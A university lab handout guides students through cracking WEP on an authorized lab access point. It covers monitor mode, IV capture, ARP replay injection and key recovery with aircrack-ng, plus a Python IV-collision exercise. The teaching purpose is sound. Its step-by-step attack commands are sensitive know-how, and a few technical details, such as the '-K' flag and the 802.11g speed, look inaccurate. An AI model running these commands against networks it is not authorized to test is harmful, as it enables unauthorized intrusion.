Classroom Glossary Public page

WIR-101 Lab 3 — WEP Crack: IV Collection and PTW Attack

685 words

Prerequisites: Week 3 lecture; aircrack-ng suite installed; authorized WEP lab AP available Duration: ~90 min Points: 100

Authorization

  • Lab Authorization Form signed
  • Target: authorized WEP lab AP only (SSID: VCA-WIR101-WEP -- confirm BSSID with instructor before starting)
  • Do not attempt to crack any other AP visible in airodump-ng
  • Cracked key is for academic documentation only; do not use it to access other systems

Objective

Execute the complete WEP cracking chain: monitor mode, passive IV collection, ARP replay to accelerate collection, and PTW attack with aircrack-ng. Understand at each step why the attack works.

Part A — Monitor Mode and Target Identification (10 min)

sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon

Locate VCA-WIR101-WEP in the output. Record:

  • BSSID: ___
  • Channel: ___
  • ENC column (should show "WEP")

Lock to the target:

sudo airodump-ng -c CHANNEL --bssid BSSID -w wep_capture --output-format pcap,csv wlan0mon

Leave this terminal running. Open a second terminal for the remaining steps.

Deliverable A

Screenshot of airodump-ng with the WEP AP visible and selected.

Part B — Passive IV Collection (15 min)

Wait 10 minutes with airodump-ng running. The #Data column counts captured data packets. WEP IVs are one per data frame, so this column approximately equals IV count.

On a quiet network with no clients actively transmitting, IV collection will be slow. If you have fewer than 500 IVs after 10 minutes, proceed to Part C (ARP replay) to accelerate.

Note the IV count at the end of Part B.

Deliverable B

Screenshot of airodump-ng showing the data frame count after passive collection.

Part C — ARP Replay Attack (20 min)

The ARP replay attack captures an ARP request from the network and replays it rapidly, forcing the AP to generate new encrypted responses (each with a unique IV).

First, authenticate to the AP (open-system auth, required before injection):

sudo aireplay-ng -1 0 -e VCA-WIR101-WEP -a BSSID -h OUR_MAC wlan0mon

Then start the ARP replay:

sudo aireplay-ng -3 -b BSSID -h OUR_MAC wlan0mon

You should see "Read X packets, sent Y packets" incrementing rapidly once an ARP packet is captured. The airodump-ng #Data counter should climb at hundreds of packets per minute.

Wait until you have at least 20,000 IVs (or 40,000 for the 104-bit key variant), then proceed to Part D.

Note: if no ARP packets are captured within 5 minutes, ask the instructor to connect a client to the lab AP and generate some traffic.

Deliverable C

Screenshot of aireplay-ng output showing active ARP replay with packet counts.

Part D — PTW Crack with aircrack-ng (20 min)

With 20,000+ IVs captured, attempt the crack:

aircrack-ng -K wep_capture-01.cap

The -K flag enables the Korek/PTW attack. aircrack-ng will report the key when found, or "KEY NOT FOUND" with a recommendation to collect more IVs.

If PTW fails at 20,000: continue collecting to 40,000 and retry.

Record:

  • Number of IVs at crack attempt: ___
  • Did the crack succeed? (yes/no)
  • If yes: the WEP key in hex: ___
  • Time taken: ___

Deliverable D

Screenshot of aircrack-ng showing the cracked key (or the "KEY NOT FOUND" output with IV count if it did not succeed -- and explain why more IVs are needed).

Part E — Analysis (15 min)

In Python, implement a simplified demonstration of the IV collision problem:

import numpy as np

# Simulate WEP IV birthday collision
# How many frames before a collision with 24-bit IVs?
np.random.seed(42)
iv_space = 2**24  # 16,777,216 possible IVs

def frames_to_first_collision():
    seen = set()
    count = 0
    while True:
        iv = np.random.randint(0, iv_space)
        if iv in seen:
            return count
        seen.add(iv)
        count += 1

# Note: full simulation would be slow; use the birthday problem approximation instead
# Expected collisions at frame count N: N*(N-1) / (2 * IV_space)
# At what N does expected_collisions >= 1?
import math
N = math.ceil(math.sqrt(2 * iv_space) + 0.5)
print(f"Expected first IV collision at approximately {N:,} frames")
print(f"At 100 Mbps 802.11g with 1500-byte frames: {N / (100e6/1500/8):.0f} seconds")

Run this and record the output. Relate it to the FMS attack: why does IV collision matter for key recovery?

Deliverable E

The Python output + a 2-paragraph explanation connecting IV collision to the FMS attack.

Write-up Questions

  1. Explain why the ARP replay attack accelerates WEP cracking rather than just being a denial-of-service.
  2. The PTW attack requires ~40,000 IVs for 104-bit WEP. If the AP transmits at 1000 data frames/sec, how long does passive collection take? How long with ARP replay at 500 replays/sec?
  3. WPA was designed as a firmware upgrade for existing WEP hardware. TKIP retained RC4 but used a 48-bit IV and per-packet key mixing. Does per-packet key mixing defeat the FMS attack? Explain why or why not.
  4. A client connects to your cracked WEP AP. You have the WEP key. Can you decrypt their traffic with Wireshark? How?

Cleanup

sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager

Virtual Path

The virtual path for this lab provides wep_capture_40k_ivs.cap -- a pre-captured file with 40,000+ IVs. Run aircrack-ng against it directly (skip Parts A-C). You still complete Parts D and E.

Submission

Zip into lab3_YOURNAME.zip:

  • deliverable_A.png through deliverable_E.{md,png,txt}
  • writeup.md
  • wep_iv_analysis.py (Part E code)